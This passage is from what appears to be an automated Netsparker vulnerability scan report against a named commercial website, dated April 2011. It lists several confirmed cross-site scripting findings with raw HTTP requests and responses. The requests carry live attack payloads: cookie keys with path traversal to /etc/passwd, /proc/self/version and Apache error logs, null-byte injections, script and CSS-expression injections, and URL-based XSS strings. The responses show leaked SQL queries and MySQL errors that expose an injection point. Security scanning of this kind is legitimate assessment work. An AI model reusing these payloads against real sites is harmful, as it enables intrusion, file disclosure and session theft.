OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9sj3d70vg3dbpkso5iiut7lqu0; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/

/ppc/leadflow/ CONFIRMED

http://www.insideup.com/ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0004F6)</script>

Request

GET /ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004F6)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4fk2qmcq53beqjoabeifsnm3e7; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>' OR prj.project_page_url = 'leadflow/?nsextt='"--></style></script><script>netsparker(0x0004F6)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004F6)</script>/' union select prj.catI' at line 5
- /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000542)%3C/script%3E

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000542)</script>

Request

GET /ppc/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000542)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=takhlbbrch3l1oq05bjijkh6h3; path=/
Content-Length: 2793
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = 
''"--></style></script><script>netsparker(0x000542)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>' OR prj.project_page_url = ''"--></style></script><script>netsparker(0x000542)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000542)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E

/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00050F)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x00050F)</script>

Request

GET /ppc/leadflow/wede00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00050F)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 